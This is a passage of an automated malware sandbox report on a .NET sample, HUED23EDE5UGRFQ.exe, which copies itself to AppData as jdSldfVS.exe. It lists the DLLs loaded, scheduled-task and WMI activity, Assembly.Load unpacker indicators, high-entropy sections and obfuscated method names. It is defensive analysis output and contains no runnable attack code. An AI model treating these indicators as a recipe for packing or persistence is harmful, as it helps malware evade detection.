                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: HUED23EDE5UGRFQ.exe, OptionsWindow.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: jdSldfVS.exe.0.dr, OptionsWindow.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.cs.Net Code: q9teSJ6F7G System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.cs.Net Code: q9teSJ6F7G System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.cs.Net Code: q9teSJ6F7G System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_01592540 push 55030BC3h; ret 10_2_0159254D
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB5F29 push es; ret 10_2_07AB5F2A
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB3730 push A407A9C5h; ret 10_2_07AB3735
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB5EF9 push es; ret 10_2_07AB5EFA
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB5E63 push es; ret 10_2_07AB5E6A
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB5E60 push es; ret 10_2_07AB5E62
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB6999 push cs; ret 10_2_07AB699A
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00457106 push ecx; ret 17_2_00457119
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0045B11A push esp; ret 17_2_0045B141
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0045E54D push esi; ret 17_2_0045E556
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00457A28 push eax; ret 17_2_00457A46
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00434E56 push ecx; ret 17_2_00434E69
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: section name: .text entropy: 7.9794014993218445
                  Source: jdSldfVS.exe.0.drStatic PE information: section name: .text entropy: 7.9794014993218445
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, VrKmqeMx6E5LwgMLC4.csHigh entropy of concatenated method names: 'Hk4PbZ6o4W', 'VnOPQM2EvY', 'dQ3PAdMbr5', 'RrjPkQgbk9', 'GdUPvUwXie', 'Iu5A9QMDGZ', 'swAA3J5jSD', 'OGQAMjonbp', 'IlVAubPjAv', 'uaTAgVOgfP'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, IAZmwL4UXY1NmAmY0w.csHigh entropy of concatenated method names: 'x4dwfjD7lx', 'bXNwTXmSlW', 'x6ZwRUCnTU', 'nDKwGUZ9cB', 'ooGws6yYUT', 'Jg3woJxfib', 'tv3wYmOAms', 'sDAwiXeBJ8', 'AGbw4tPchd', 'uBYw7cABxV'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, EdXujie0QO3KCWsV9Qe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EWw7myx8Xg', 'tgM7nSnlDS', 'WYx7NdtG5s', 'QWL7aFNuWN', 'aLJ79vHwDM', 'Jim730CBsR', 'oHm7MWbIT6'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, hlyFOV3NjigwVy9fWY.csHigh entropy of concatenated method names: 'qDsKRXhbuX', 'fyJKGAkTmK', 'Nm5Kq5QiVA', 'sehKUAXuPH', 'MWOK0HHkTE', 'lxkKElCtxW', 'qcVKWrPrIx', 'zWDKxmvBnu', 'UbiK1N4cM5', 'wBjKpj5Qcw'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, IhhE4IzvotpcF7E1nA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gxD4K2YmEV', 'rtj4s9kOKg', 'bcr4oIWZjq', 'TNr4YvISuw', 'jGW4iHoZYy', 'rmj44epd0y', 'i3A47A7BEN'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, omVVIsy4JEq4JnFNAX.csHigh entropy of concatenated method names: 'EgDSs6MYC', 'jYxfUQvu8', 'yUCTwEpHm', 'bOu5YFQOJ', 'w4PGF4JH8', 'ANyXrZKI8', 'klr8eTiECNQnABjAq9', 'gJgGq5P51BjqKhEsa3', 'nhji4jqOJ', 'gjb7kQr5c'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, LSEQgSWw6PFKkwBvUW.csHigh entropy of concatenated method names: 'Q2m4IAvWFa', 'TSd4yo1BkD', 'chP4e03fj1', 'Joh4Jx8hrE', 'Udn4Q1UQbF', 'Ohb4AbKENj', 'lZd4Pwy1Ah', 'D4LiMCDf3c', 'Fediuk7eN7', 'Mycigmo5s5'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, C5Fi006NlErAQ6vXTa.csHigh entropy of concatenated method names: 'rM5YBeiIku', 'dT1YrB7yhh', 'ToString', 'Ao3YJ0DXSw', 'E3XYQYK3cL', 'gWnYwMF2Vj', 'HFKYAbWJkm', 'w5bYPoqBjv', 'gQQYkPE11J', 'RHdYvwLqhL'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, n026WbD77LwpII4skq.csHigh entropy of concatenated method names: 'lJHAFjLdXH', 'AsMA5B816f', 'vfrwtn6SYn', 'vHuw0lcSKs', 'vnUwEc939r', 'UB3wCmGo0e', 'lRXwWRdJ55', 'G12wxZTVE2', 'XLqwdOpbpe', 'BiAw16wqCc'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, QUsUCJZYbbjkgd53fi.csHigh entropy of concatenated method names: 'Jt1Ik8ZB02', 'shyIvcio2y', 'vlbIBjhP3D', 'N11Irfslj0', 'gGjIsOHOSk', 'uwiIoisVXe', 'WsVbIsEdoSd1VYCdns', 'VdMVqG0teZ9AKdHlWT', 'dbyIIL1OnQ', 'mv8IyFivtb'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, KevtKNusq8g1AfXZ5c.csHigh entropy of concatenated method names: 'BaskcxbOHJ', 'LYukZdPo3O', 'HX9kSewxDQ', 'NvykfmtBjl', 'M5ikFbNDVL', 'UsokTm9dBM', 'DGKk5ldC6t', 'SDwkRX5ySJ', 'V9vkGpn5Zb', 'WvkkXS8vqt'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.csHigh entropy of concatenated method names: 'pt5yb7OWcw', 'XFRyJUg1wV', 'NnHyQgEXDc', 'oyQywJoPli', 't8YyA8yUdn', 'N7QyP3H2AE', 'sjiykyXWgr', 'rGsyvLuMG5', 'v95y6xTj0e', 'oWXyBiLwIp'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, O7QaxOP1WHfuKiysCB.csHigh entropy of concatenated method names: 'iF1iqN2Ix7', 'qyJiUJAgbi', 'atRitsUWSG', 'UoEi0ZTDMw', 'dquimOLOel', 'cZ3iEOe2tr', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, UsNrrbl72Ir1JF4Inh.csHigh entropy of concatenated method names: 'RR5iJQSZlT', 'aM7iQBhrAS', 'EZKiwuLK8J', 'hDPiAhGv1Q', 'GGJiPL0pxD', 'vegikF3Qys', 'Qrwivv9eID', 'pOEi6NrRx0', 'xqfiBhaXAK', 'eR8irPgAc5'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ULLvmxT725yvDGgCf2.csHigh entropy of concatenated method names: 'Kufs1jK0Hw', 'DIrshoW4RW', 'zFvsmLWmUu', 'lwisncaH5M', 'bBEsUdMnPP', 'w0kstIFyvh', 'I1ls0VZ5DC', 'tNWsEiwVEj', 'MkwsCcVV2Q', 'caEsWea0Dc'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, DSSwTQO1NWXixqGlCL.csHigh entropy of concatenated method names: 'zlBQmA66Lh', 'EEQQnjJRDT', 'A1eQNBJOhJ', 'P55Qaden2w', 't1bQ96PaJw', 'HNyQ3WKvm1', 'yClQMfqAY5', 'AODQuFaXhT', 'j5aQg4rj8o', 'alRQDH46qh'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, oT9uaNmRpGhyBXALGV.csHigh entropy of concatenated method names: 'O8VkJWd4Cf', 'bbLkwssU52', 'quRkPAjuXO', 'KmOPD0dkpB', 's50PzKtHQL', 'xX2kOGa260', 'TAdkI3bhaB', 'TBdk2twsMf', 'Acwky4QwXT', 'ueckeQIEnl'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, x2AqPHq2qhLej4XYqg.csHigh entropy of concatenated method names: 'QoIPN1ljCY', 'B0WPaOkxZO', 'A3tP9aiSEI', 'ToString', 'HsiP3vy0jA', 'e2sPMT2cGD', 'VmfrR0l3MWhDe4bkGsg', 'UBP4OtlNENICldRnPou', 'VU6ZITlrYnYsgKZkO7Q', 'OFxHAyly07COCRvgANx'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, flsNFv1jqRn4UFfbYv.csHigh entropy of concatenated method names: 'AK1Yuw30dv', 'DMNYDKofPr', 't1tiO2Iai7', 'gi5iIVjKpB', 'Xp4YpUP5CX', 'M75Yhl2fHN', 'EG4Y81lKAP', 'qmWYmw7roK', 'lAHYnUmdON', 'EwkYNZeps6'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, qVbjiYeg51FIPLgDide.csHigh entropy of concatenated method names: 'zwH4cUCJDl', 'vdX4ZNxuaD', 'LOa4Sx6V7l', 'uFB4fUUoZO', 'Oft4FIqtry', 'Qce4TCe74A', 'wl345clhix', 't2K4Red2VO', 'Y4M4GK1488', 'HmA4Xk0S9m'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, yxkao7hiFSsCxJrj6x.csHigh entropy of concatenated method names: 'Dispose', 'scYIg4SsGH', 'NsG2UcEpqL', 'aYvjjmHQdT', 'xXHIDRqdFg', 'sCgIzqmx7K', 'ProcessDialogKey', 'FDb2ONo6rM', 'XZY2IVTUPT', 'fVb22oh36r'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, VrKmqeMx6E5LwgMLC4.csHigh entropy of concatenated method names: 'Hk4PbZ6o4W', 'VnOPQM2EvY', 'dQ3PAdMbr5', 'RrjPkQgbk9', 'GdUPvUwXie', 'Iu5A9QMDGZ', 'swAA3J5jSD', 'OGQAMjonbp', 'IlVAubPjAv', 'uaTAgVOgfP'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, IAZmwL4UXY1NmAmY0w.csHigh entropy of concatenated method names: 'x4dwfjD7lx', 'bXNwTXmSlW', 'x6ZwRUCnTU', 'nDKwGUZ9cB', 'ooGws6yYUT', 'Jg3woJxfib', 'tv3wYmOAms', 'sDAwiXeBJ8', 'AGbw4tPchd', 'uBYw7cABxV'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, EdXujie0QO3KCWsV9Qe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EWw7myx8Xg', 'tgM7nSnlDS', 'WYx7NdtG5s', 'QWL7aFNuWN', 'aLJ79vHwDM', 'Jim730CBsR', 'oHm7MWbIT6'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, hlyFOV3NjigwVy9fWY.csHigh entropy of concatenated method names: 'qDsKRXhbuX', 'fyJKGAkTmK', 'Nm5Kq5QiVA', 'sehKUAXuPH', 'MWOK0HHkTE', 'lxkKElCtxW', 'qcVKWrPrIx', 'zWDKxmvBnu', 'UbiK1N4cM5', 'wBjKpj5Qcw'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, IhhE4IzvotpcF7E1nA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gxD4K2YmEV', 'rtj4s9kOKg', 'bcr4oIWZjq', 'TNr4YvISuw', 'jGW4iHoZYy', 'rmj44epd0y', 'i3A47A7BEN'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, omVVIsy4JEq4JnFNAX.csHigh entropy of concatenated method names: 'EgDSs6MYC', 'jYxfUQvu8', 'yUCTwEpHm', 'bOu5YFQOJ', 'w4PGF4JH8', 'ANyXrZKI8', 'klr8eTiECNQnABjAq9', 'gJgGq5P51BjqKhEsa3', 'nhji4jqOJ', 'gjb7kQr5c'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, LSEQgSWw6PFKkwBvUW.csHigh entropy of concatenated method names: 'Q2m4IAvWFa', 'TSd4yo1BkD', 'chP4e03fj1', 'Joh4Jx8hrE', 'Udn4Q1UQbF', 'Ohb4AbKENj', 'lZd4Pwy1Ah', 'D4LiMCDf3c', 'Fediuk7eN7', 'Mycigmo5s5'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, C5Fi006NlErAQ6vXTa.csHigh entropy of concatenated method names: 'rM5YBeiIku', 'dT1YrB7yhh', 'ToString', 'Ao3YJ0DXSw', 'E3XYQYK3cL', 'gWnYwMF2Vj', 'HFKYAbWJkm', 'w5bYPoqBjv', 'gQQYkPE11J', 'RHdYvwLqhL'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, n026WbD77LwpII4skq.csHigh entropy of concatenated method names: 'lJHAFjLdXH', 'AsMA5B816f', 'vfrwtn6SYn', 'vHuw0lcSKs', 'vnUwEc939r', 'UB3wCmGo0e', 'lRXwWRdJ55', 'G12wxZTVE2', 'XLqwdOpbpe', 'BiAw16wqCc'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, QUsUCJZYbbjkgd53fi.csHigh entropy of concatenated method names: 'Jt1Ik8ZB02', 'shyIvcio2y', 'vlbIBjhP3D', 'N11Irfslj0', 'gGjIsOHOSk', 'uwiIoisVXe', 'WsVbIsEdoSd1VYCdns', 'VdMVqG0teZ9AKdHlWT', 'dbyIIL1OnQ', 'mv8IyFivtb'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, KevtKNusq8g1AfXZ5c.csHigh entropy of concatenated method names: 'BaskcxbOHJ', 'LYukZdPo3O', 'HX9kSewxDQ', 'NvykfmtBjl', 'M5ikFbNDVL', 'UsokTm9dBM', 'DGKk5ldC6t', 'SDwkRX5ySJ', 'V9vkGpn5Zb', 'WvkkXS8vqt'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.csHigh entropy of concatenated method names: 'pt5yb7OWcw', 'XFRyJUg1wV', 'NnHyQgEXDc', 'oyQywJoPli', 't8YyA8yUdn', 'N7QyP3H2AE', 'sjiykyXWgr', 'rGsyvLuMG5', 'v95y6xTj0e', 'oWXyBiLwIp'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, O7QaxOP1WHfuKiysCB.csHigh entropy of concatenated method names: 'iF1iqN2Ix7', 'qyJiUJAgbi', 'atRitsUWSG', 'UoEi0ZTDMw', 'dquimOLOel', 'cZ3iEOe2tr', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, UsNrrbl72Ir1JF4Inh.csHigh entropy of concatenated method names: 'RR5iJQSZlT', 'aM7iQBhrAS', 'EZKiwuLK8J', 'hDPiAhGv1Q', 'GGJiPL0pxD', 'vegikF3Qys', 'Qrwivv9eID', 'pOEi6NrRx0', 'xqfiBhaXAK', 'eR8irPgAc5'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ULLvmxT725yvDGgCf2.csHigh entropy of concatenated method names: 'Kufs1jK0Hw', 'DIrshoW4RW', 'zFvsmLWmUu', 'lwisncaH5M', 'bBEsUdMnPP', 'w0kstIFyvh', 'I1ls0VZ5DC', 'tNWsEiwVEj', 'MkwsCcVV2Q', 'caEsWea0Dc'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, DSSwTQO1NWXixqGlCL.csHigh entropy of concatenated method names: 'zlBQmA66Lh', 'EEQQnjJRDT', 'A1eQNBJOhJ', 'P55Qaden2w', 't1bQ96PaJw', 'HNyQ3WKvm1', 'yClQMfqAY5', 'AODQuFaXhT', 'j5aQg4rj8o', 'alRQDH46qh'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, oT9uaNmRpGhyBXALGV.csHigh entropy of concatenated method names: 'O8VkJWd4Cf', 'bbLkwssU52', 'quRkPAjuXO', 'KmOPD0dkpB', 's50PzKtHQL', 'xX2kOGa260', 'TAdkI3bhaB', 'TBdk2twsMf', 'Acwky4QwXT', 'ueckeQIEnl'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, x2AqPHq2qhLej4XYqg.csHigh entropy of concatenated method names: 'QoIPN1ljCY', 'B0WPaOkxZO', 'A3tP9aiSEI', 'ToString', 'HsiP3vy0jA', 'e2sPMT2cGD', 'VmfrR0l3MWhDe4bkGsg', 'UBP4OtlNENICldRnPou', 'VU6ZITlrYnYsgKZkO7Q', 'OFxHAyly07COCRvgANx'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, flsNFv1jqRn4UFfbYv.csHigh entropy of concatenated method names: 'AK1Yuw30dv', 'DMNYDKofPr', 't1tiO2Iai7', 'gi5iIVjKpB', 'Xp4YpUP5CX', 'M75Yhl2fHN', 'EG4Y81lKAP', 'qmWYmw7roK', 'lAHYnUmdON', 'EwkYNZeps6'
                  Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, qVbjiYeg51FIPLgDide.csHigh entropy of concatenated method names: 'zwH4cUCJDl', 'vdX4ZNxuaD', 'LOa4Sx6V7l', 'uFB4fUUoZO', 'Oft4FIqtry', 'Qce4TCe74A', 'wl345clhix', 't2K4Red2VO', 'Y4M4GK1488', 'HmA4Xk0S9m'
